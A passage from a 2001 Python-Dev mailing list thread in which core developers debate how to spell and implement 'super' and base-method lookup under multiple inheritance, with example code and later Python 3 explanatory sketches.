(e.g. the same base class may appear in different branches of the
inheritance tree).
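A short Python 3 sketch of that ambiguity with a diamond (the class names are illustrative). The classic depth-first walk lists the shared base twice and finds `Base.foo` before ever reaching `Right.foo`. The C3 linearization, adopted for new-style classes in Python 2.3 and used by all Python 3 classes, lists the shared base once, after both branches.

```python
class Base:
    def foo(self):
        return "Base.foo"

class Left(Base):
    pass

class Right(Base):
    def foo(self):
        return "Right.foo"

class Bottom(Left, Right):
    pass


def classic_order(cls):
    """Classic left-to-right, depth-first walk; repeats shared bases."""
    order = [cls]
    for base in cls.__bases__:
        order.extend(classic_order(base))
    return order


classic_names = [k.__name__ for k in classic_order(Bottom) if k is not object]
print(classic_names)   # ['Bottom', 'Left', 'Base', 'Right', 'Base']

# The classic walk reaches Base.foo (via Left) before Right.foo.
first = next(k for k in classic_order(Bottom) if "foo" in vars(k))
print(first.__name__)  # Base

# C3 lists Base only once, after both branches.
mro_names = [k.__name__ for k in Bottom.__mro__]
print(mro_names)       # ['Bottom', 'Left', 'Right', 'Base', 'object']
print(Bottom().foo())  # Right.foo
```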

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 17:05:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:05:30 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200."
             <000d01c0d310$4ee127d0$0900a8c0@spiff> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>  
            <000d01c0d310$4ee127d0$0900a8c0@spiff> 
Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com>

> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
> 
> > Or, to relieve the burden from the symbol table, we could make super
> > a keyword, at the cost of breaking existing code.
> 
> hey, how about introducing $ as a keyword prefix for newly introduced
> keywords?
> 
>     $super.foo(arg1, arg2)
> 
> (this can of course be mapped to either of my previous suggestions;
> "$foo" either means "self.foo" or "foo(self)"...)
> 
> and to save a little typing, only use it for keywords that start with
> an "s" (should leave us plenty of expansion room):
> 
>     $uper.foo(arg1, arg2)
> 
> otoh, if "super" is common enough to motivate introducing magic objects
> into python, maybe "$" should mean "super."?
> 
>     $foo(arg1, arg2)
> 
> and while we're at it, let's introduce "@" for "self.".
> 
> gotta run -- time for my monthly reboot /F

LOL!  But you forgot the spelling of

    self.__super.foo(arg1, arg2)

which would pass in the class name that's the other necessary input to
a proper implementation of super. :-)
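The mangled spelling can indeed be made to work. Here is a sketch in Python 3, assuming a metaclass (the name `autosuper` is illustrative) that stores an unbound `super(cls)` object under each class's mangled name. Inside class `B`, `self.__super` compiles to `self._B__super`, which supplies exactly the class argument that a proper `super` needs.

```python
class autosuper(type):
    """Metaclass: give each class an unbound super object under a mangled name."""

    def __init__(cls, name, bases, namespace):
        super().__init__(name, bases, namespace)
        # Inside class `name`, `self.__super` is compiled as `self._<name>__super`.
        # (Assumes the class name has no leading underscores; mangling strips them.)
        setattr(cls, "_%s__super" % name, super(cls))


class A(metaclass=autosuper):
    def meth(self):
        return "A"

class B(A):
    def meth(self):
        return "B" + self.__super.meth()

class C(A):
    def meth(self):
        return "C" + self.__super.meth()

class D(C, B):
    def meth(self):
        return "D" + self.__super.meth()

print(D().meth())   # DCBA
```

An unbound super object is itself a descriptor, so fetching it through an instance binds it to that instance; each class in the chain then continues the search from its own position in the MRO.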

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:04:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:04:29 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>  
	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF013ED.8A190FE2@lemburg.com>

Here's an implementation of what I currently use to track down
the basemethod (taken from mx.Tools):

import sys
import types
_basemethod_cache = {}

def basemethod(object,method=None,

               cache=_basemethod_cache,InstanceType=types.InstanceType,
               ClassType=types.ClassType,None=None):

    """ Return the unbound method that is defined *after* method in the
        inheritance order of object with the same name as method
        (usually called base method or overridden method).

        object can be an instance, class or bound method. method, if
        given, may be a bound or unbound method. If it is not given,
        object must be a bound method.

        Note: Unbound methods must be called with an instance as first
        argument.

        The function uses a cache to speed up processing. Changes done
        to the class structure after the first hit will not be noticed
        by the function.

        XXX Rewrite in C to increase performance.

    """
    if method is None:
        method = object
        object = method.im_self
    defclass = method.im_class
    name = method.__name__
    if type(object) is InstanceType:
        objclass = object.__class__
    elif type(object) is ClassType:
        objclass = object
    else:
        objclass = object.im_class

    # Check cache
    cacheentry = (defclass, name)
    basemethod = cache.get(cacheentry, None)
    if basemethod is not None:
        if not issubclass(objclass, basemethod.im_class):
            if __debug__:
                sys.stderr.write(
                    'basemethod(%s, %s): cached version (%s) mismatch: '
                    '%s !-> %s\n' %
                    (object, method, basemethod,
                     objclass, basemethod.im_class))
        else:
            return basemethod

    # Find defining class
    path = [objclass]
    while 1:
        if not path:
            raise AttributeError,method
        c = path[0]
        del path[0]
        if c.__bases__:
            # Prepend bases of the class
            path[0:0] = list(c.__bases__)
        if c is defclass:
            # Found (first occurrence of) defining class in inheritance
            # graph
            break
        
    # Scan rest of path for the next occurrence of a method with the
    # same name
    while 1:
        if not path:
            raise AttributeError,name
        c = path[0]
        basemethod = getattr(c, name, None)
        if basemethod is not None:
            # Found; store in cache and return
            cache[cacheentry] = basemethod
            return basemethod
        del path[0]
    raise AttributeError,'method %s' % name
    
-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 16:06:39 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:06:39 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>

/F:
> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
IMO we still need to specify the class, and there we are:

     super(self, MyClass).foo(arg1, arg2)

Thomas


From guido at digicool.com  Wed May  2 17:11:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:11:17 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200."
             <3AF01381.592AE31B@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF01381.592AE31B@lemburg.com> 
Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > 
> > > This doesn't work in Python since Python has multiple inheritance,
> > > e.g. super in
> > >
> > > class A(B,C):
> > >       def foo(self):
> > >               super.foo()
> > >
> > > is ambiguous.
> > 
> > I'm not sure what you mean.  The search is totally well-defined: first
> > search B for a foo method, then search C.
> 
> I thought you were talking about an abstract super class which is
> how Java uses this term. 

Ah.  I didn't realize.  This would suggest that another (not yet
mentioned) suggestion would be to spell the basemethod call as

    super.foo(self)

keeping more in line with the tradition of passing self explicitly
when calling basemethods.

> Rereading some of the posts, I think you are indeed referring to
> the method which foo overrides -- this is what I call basemethod
> (since it is implemented in one of the base classes).

Aha.

> > > I'd rather suggest adding a function for finding the basemethod
> > > of a method. This is probably the most common task in this context.
> > 
> > I've never heard of the concept of basemethod, but if I may venture a
> > guess, it would be the same definition as I give above.
> 
> The basemethod can be defined as the first method of the same name
> found in the inheritance tree using the standard Python lookup
> strategy (left-right, depth first) when continuing the lookup search
> at the node in the inheritance tree which defines the method querying
> the basemethod.

Yes, that's what I guessed.

> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrence calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?
> 
> Note that there are many ways of defining what a basemethod
> is, due to the ambiguities that are caused by multiple inheritance
> (e.g. the same base class may appear in different branches of the
> inheritance tree).

Well, the search will find one definite method, but you're right that
there may be situations where it's necessary to specify the specific
base class!

In C++ that is solved by writing B::foo() or C::foo().  Python doesn't
have "::" and instead overloads the "." operator.  Hmm, so even
introducing super doesn't completely remove the need to be able to
write C.foo to reference the unbound method foo of class C, and this
may require that my ugly rule still be needed.
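For what it's worth, Python 3 kept the dotted spelling for this case (hindsight, not part of this thread). In this sketch, with illustrative class names, `super()` follows the lookup order and lands on `B.foo`, while naming the class, much like C++'s `C::foo()`, selects one particular base.

```python
class B:
    def foo(self):
        return "B.foo"

class C:
    def foo(self):
        return "C.foo"

class A(B, C):
    def foo(self):
        # super() follows the lookup order, which reaches B first...
        via_super = super().foo()
        # ...while naming the class picks a specific base, like C::foo().
        via_c = C.foo(self)
        return via_super, via_c

print(A().foo())   # ('B.foo', 'C.foo')
```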

AFAIK, Smalltalk has only single inheritance, and so does Java, so
there 'super' is enough.  Will we need to add a "::" operator to
Python???

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:19:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:19:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200."
             <3AF013ED.8A190FE2@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF013ED.8A190FE2@lemburg.com> 
Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com>

> Here's an implementation of what I currently use to track down
> the basemethod (taken from mx.Tools):

How am I supposed to use this?

I tried this:

    class B:
        def foo(self):
            print "B.foo"

    class C(B):
        def foo(self):
            print "C.foo"
            B.foo(self)
            print basemethod(self.foo) # Expect this to be B.foo

    class D(C):
        def foo(self):
            print "D.foo"
            C.foo(self)

    d = D()
    d.foo()

but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
required.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:23:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:23:33 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200."
             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>

> > Except that sometimes you really do want x.__class__.__classdict__ to
> > have priority (e.g. for "guarded" attributes).
> 
> What's a "guarded" attribute?

I meant an attribute that's implemented by a pair of get and set
functions.  This is very useful; my proposed design lets you define
this more directly rather than requiring you to override __getattr__
and __setattr__.
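Python 2.2 later provided exactly this as the built-in `property`. Below is a minimal Python 3 sketch with illustrative names: the get/set pair lives in the class's `__dict__`, and no `__getattr__`/`__setattr__` override is involved.

```python
class Temperature:
    """A "guarded" attribute: reads and writes of .celsius go through functions."""

    def __init__(self, celsius=0.0):
        self.celsius = celsius          # goes through the setter below

    def _get_celsius(self):
        return self._celsius

    def _set_celsius(self, value):
        if value < -273.15:
            raise ValueError("below absolute zero")
        self._celsius = value

    # The get/set pair is stored in Temperature.__dict__['celsius'].
    celsius = property(_get_celsius, _set_celsius)


t = Temperature(20)
t.celsius = 25
print(t.celsius)                  # 25
try:
    t.celsius = -300
except ValueError as exc:
    print(exc)                    # below absolute zero
```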

> > But the issue of backwards compatibility is a big one here
> 
> I was thinking that, while this is still in the __future__,
> the __dict__ attribute would be a pseudo-dict that, by
> default, behaves like the union of the old __dict__ and
> the __classdict__.

Actually, I think that what's in the __dict__ is just perfect; it's
the definition of getattr(classobject, name) where name is both an
instance and a class method that causes trouble.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:29:20 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:29:20 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
	            <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com>
Message-ID: <3AF019C0.716E6D35@lemburg.com>

Guido van Rossum wrote:
> 
> > Here's an implementation of what I currently use to track down
> > the basemethod (taken from mx.Tools):
> 
> How am I supposed to use this?
> 
> I tried this:
> 
>     class B:
>         def foo(self):
>             print "B.foo"
> 
>     class C(B):
>         def foo(self):
>             print "C.foo"
>             B.foo(self)
>             print basemethod(self.foo) # Expect this to be B.foo

This finds the basemethod of self.foo, meaning the method overridden
by D.foo. To get at the basemethod of C.foo, you'd have to call

basemethod(self, C.foo)

Note that the intent here is to be able to call basemethods
even in case the defining class is only a mixin class -- a very
common situation at least in many of my applications (keeps
inheritance trees shallow and increases readability of the code).
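In Python 2.2 and later, `basemethod(self, C.foo)` is spelled `super(C, self).foo`, and Python 3 also accepts a bare `super()` inside the method. Here is a Python 3 rerun of the B/C/D example, with the prints turned into return values so the chain is visible:

```python
class B:
    def foo(self):
        return ["B.foo"]

class C(B):
    def foo(self):
        # Name the class whose method is being overridden, not type(self):
        # even when self is a D, the search continues after C.
        return ["C.foo"] + super(C, self).foo()

class D(C):
    def foo(self):
        return ["D.foo"] + super(D, self).foo()

print(D().foo())                              # ['D.foo', 'C.foo', 'B.foo']
print(super(C, D()).foo.__func__ is B.foo)    # True
```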
 
>     class D(C):
>         def foo(self):
>             print "D.foo"
>             C.foo(self)
> 
>     d = D()
>     d.foo()
> 
> but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
> required.
> 
> --Guido van Rossum (home page: http://www.python.org/~guido/)
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> http://mail.python.org/mailman/listinfo/python-dev

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Wed May  2 16:15:58 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 16:15:58 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>
Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid>

thomas wrote:

> > why not spell it out:
> > 
> >     self.__super__.foo(arg1, arg2)
> > 
> > or
> > 
> >     self.super.foo(arg1, arg2)
> > 
> > or
> > 
> >     super(self).foo(arg1, arg2)
>
> IMO we still need to specify the class, and there we are:
> 
>      super(self, MyClass).foo(arg1, arg2)

isn't that the same as self.__class__ ?  in which case
super is something like:

import new

class super:
    def __init__(self, instance):
        self.instance = instance
    def __getattr__(self, name):
        for klass in self.instance.__class__.__bases__:
            member = getattr(klass, name, None)
            if member is not None:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

(I'm even more confused than my pythonware.com colleague)
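Not quite: `self.__class__` is the class of the instance, not the class whose method is running. The Python 3 port of the sketch above shows what happens once the hierarchy is three levels deep: `Middle.hello` keeps finding itself. The `new` module is gone, so the bound method is built with `__get__`, and `naive_super` and the class names are illustrative.

```python
class naive_super:
    """Port of the sketch above: searches self.__class__.__bases__."""

    def __init__(self, instance):
        self.instance = instance

    def __getattr__(self, name):
        for klass in self.instance.__class__.__bases__:
            member = getattr(klass, name, None)
            if member is not None:
                if callable(member):
                    # Bind the function to the instance (replaces new.instancemethod).
                    return member.__get__(self.instance, klass)
                return member
        raise AttributeError(name)


class Base:
    def hello(self):
        return "Base"

class Middle(Base):
    def hello(self):
        return "Middle+" + naive_super(self).hello()

class Leaf(Middle):
    def hello(self):
        return "Leaf+" + naive_super(self).hello()


print(Middle().hello())    # Middle+Base   (two levels: fine)
try:
    Leaf().hello()         # three levels: Middle.hello finds Middle.hello again
    outcome = "finished"
except RecursionError:
    outcome = "RecursionError"
print(outcome)             # RecursionError
```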

Cheers /F


From donb at abinitio.com  Wed May  2 16:41:14 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 10:41:14 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <200105021441.KAA08444@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> [Greg Ward, welcome back!]
> >   * 'super' is a magic object that only makes sense inside a 'def'
> >     inside a 'class' (at least for now; perhaps it could be generalized
> >     to work at class scope as well as method scope, but let's keep
> >     it simple)
> 
> Yes, that's about the only way it can be made to work.  The compiler
> will have to (1) detect that 'super' is a free variable, and (2) make
> it a local and initialize it with the proper magic.  Or, to relieve
> the burden from the symbol table, we could make super a keyword, at
> the cost of breaking existing code.

I'm not at all sure I like the idea of 'super'.  It's far more magic
than I am used to (coming from Python at least).  Currently, we spell
'super' like this:

     class foo(bar):
         def __repr__(self):
             return bar.__repr__(self)  # that's super!

I like the explicit nature of it.  As Guido points out however, this
ends up being ambiguous when we try to make classes more
"instance-like".

Now, how do I like to spell super?

     class foo(bar):
         def __repr__(self):
             return bar._.__repr__(self)  # now that's really super!

or, for those who like the "keyword":

     class foo(bar):
         def __repr__(self):
             super = bar._
             return super.__repr__(self)

The trick here is in the implementation of getattr on the '_'.  It returns
a proxy object for the class.  When attributes are accessed through it
a different search path is taken.  This path is the same path that
would be taken by instance attribute look up.  In my code, I refer to
this object as the 'unbound instance'.  Since accessing a function
through this object will yield an unbound instance method, the name
makes sense to me.
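A minimal Python 3 sketch of the "unbound instance" idea. It assumes `_` is provided by a descriptor on a common base class; Donald's actual implementation is not shown, and `UnboundInstance`, `UnboundInstanceAttr`, `Meta`, and `describe` are hypothetical names. The proxy resolves names only through the class and its bases (the path instance lookup takes) and never consults the metaclass. In Python 3 a function fetched this way is a plain function rather than an unbound method, so `self` is passed explicitly, as in the spelling above.

```python
class UnboundInstance:
    """Proxy for a class that resolves names the way instance lookup would:
    through the class and its bases (its MRO), never through its metaclass."""

    def __init__(self, cls):
        self._cls = cls

    def __getattribute__(self, name):
        # Overriding __getattribute__ (not only __getattr__) ensures that names
        # the proxy itself inherits from object, such as __repr__, are still
        # looked up on the proxied class.
        cls = object.__getattribute__(self, "_cls")
        for klass in cls.__mro__:
            if name in vars(klass):
                return vars(klass)[name]  # raw function; caller passes self
        raise AttributeError(name)


class UnboundInstanceAttr:
    """Descriptor that makes `SomeClass._` return an UnboundInstance."""

    def __get__(self, obj, owner):
        return UnboundInstance(owner)


class Meta(type):
    def describe(cls):
        # Reachable as bar.describe(), but deliberately not through bar._
        return "metaclass method"


class bar(metaclass=Meta):
    _ = UnboundInstanceAttr()

    def __repr__(self):
        return "bar"


class foo(bar):
    def __repr__(self):
        return "foo wraps " + bar._.__repr__(self)  # now that's really super!
```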

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From thomas.heller at ion-tof.com  Wed May  2 16:49:02 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:49:02 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook>

> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:
> 
> import new
> 
> class super:
>     def __init__(self, instance):
>         self.instance = instance
>     def __getattr__(self, name):
>         for klass in self.instance.__class__.__bases__:
>             member = getattr(klass, name, None)
>             if member:
>                 if callable(member):
>                     return new.instancemethod(member, self.instance, klass)
>                 return member
>         raise AttributeError(name)
> 
No, it's not the same. Consider:

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

This prints:
test X

test Y
test X

test Y
test Y
(more test Y lines deleted)
RuntimeError: maximum recursion depth exceeded

This is because super(self).test for the Z() object
should start the search in the X class, not in the Y class.
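The failure is easy to reproduce in Python 3. This sketch transliterates the instance-based `super` quoted above, renamed to the hypothetical `NaiveSuper`. `types.MethodType` stands in for `new.instancemethod`, and the methods record their calls in a list instead of printing. Because the search starts from `type(self).__bases__`, a `Z` instance that inherits `Y.test` keeps finding `Y.test` again.

```python
import types

calls = []


class NaiveSuper:
    def __init__(self, instance):
        self.instance = instance

    def __getattr__(self, name):
        # Searches the bases of the *instance's* class, which is only correct
        # when the calling method was defined in exactly that class.
        for klass in type(self.instance).__bases__:
            member = getattr(klass, name, None)
            if member is not None:
                if callable(member):
                    return types.MethodType(member, self.instance)
                return member
        raise AttributeError(name)


class X:
    def test(self):
        calls.append("X")


class Y(X):
    def test(self):
        calls.append("Y")
        NaiveSuper(self).test()


class Z(Y):
    pass
```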


Thomas


From thomas.heller at ion-tof.com  Wed May  2 16:53:17 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:53:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook>

This implementation of super works correctly:

import new

class super:
    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass
    def __getattr__(self, name):
        for klass in (self.klass,) + self.klass.__bases__:
            member = getattr(klass, name, None)
            if member is not None:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self, X).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print
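For comparison, here is a Python 3 sketch of a two-argument super. It follows the convention that Python 2.2's built-in `super(type, obj)` eventually adopted, which differs slightly from the version above. You pass the class the method is defined in (here `Y`), and the search starts just after that class in the instance's MRO. `ExplicitSuper` is a hypothetical name, and the methods log to a list instead of printing.

```python
log = []


class ExplicitSuper:
    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass  # the class whose method is making the call

    def __getattr__(self, name):
        mro = type(self.instance).__mro__
        # Skip everything up to and including the calling method's class.
        start = mro.index(self.klass) + 1
        for k in mro[start:]:
            if name in vars(k):
                member = vars(k)[name]
                if hasattr(member, "__get__"):
                    # Bind functions (and other descriptors) to the instance.
                    return member.__get__(self.instance, type(self.instance))
                return member
        raise AttributeError(name)


class X:
    def test(self):
        log.append("test X")


class Y(X):
    def test(self):
        log.append("test Y")
        ExplicitSuper(self, Y).test()


class Z(Y):
    pass
```

With the built-in, the call in `Y.test` would be written `super(Y, self).test()`, or in Python 3 simply `super().test()`.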

Thomas


From donb at abinitio.com  Wed May  2 17:31:45 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:31:45 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105021531.LAA08940@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> AFAIK, Smalltalk has only single inheritance, and so does Java, so
> there 'super' is enough.  Will we need to add a "::" operator to
> Python???

Multiple inheritance introduces a potential wrinkle in my definition
of the unbound instance.  The problem is that search starts one level
too high.  That is in:

    class foo(b1, b2):
          def __repr__(self):
              super = b1._  #this one
              super = b2._  #or this one?
              return super.__repr__(self)

we don't know which base class to choose as the starting point for the
search.  This problem already exists.  Now, if we want to avoid it,
this:

    class foo(b1, b2):
          def __repr__(self):
              super = foo.__super__
              return super.__repr__(self)


comes to mind.
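In today's Python 3, `super(foo, self)` does not pick one base at all. It continues along the method resolution order (MRO) of the instance's class, so each class's `super()` call hands off to the next class in that linear order. A small sketch with hypothetical classes `base`, `b1`, `b2`, and `foo`:

```python
class base:
    def __repr__(self):
        return "base"


class b1(base):
    def __repr__(self):
        return "b1 -> " + super(b1, self).__repr__()


class b2(base):
    def __repr__(self):
        return "b2 -> " + super(b2, self).__repr__()


class foo(b1, b2):
    def __repr__(self):
        # No need to choose between b1 and b2: the MRO decides.
        return "foo -> " + super(foo, self).__repr__()
```

`b1`'s `super()` call reaches `b2` for a `foo` instance, even though `b1` knows nothing about `b2`. The starting point is lexical (the class named in the call), but the path is taken from the instance's class.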

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                      ...Will hack for sushi...


From donb at abinitio.com  Wed May  2 17:37:39 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:37:39 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
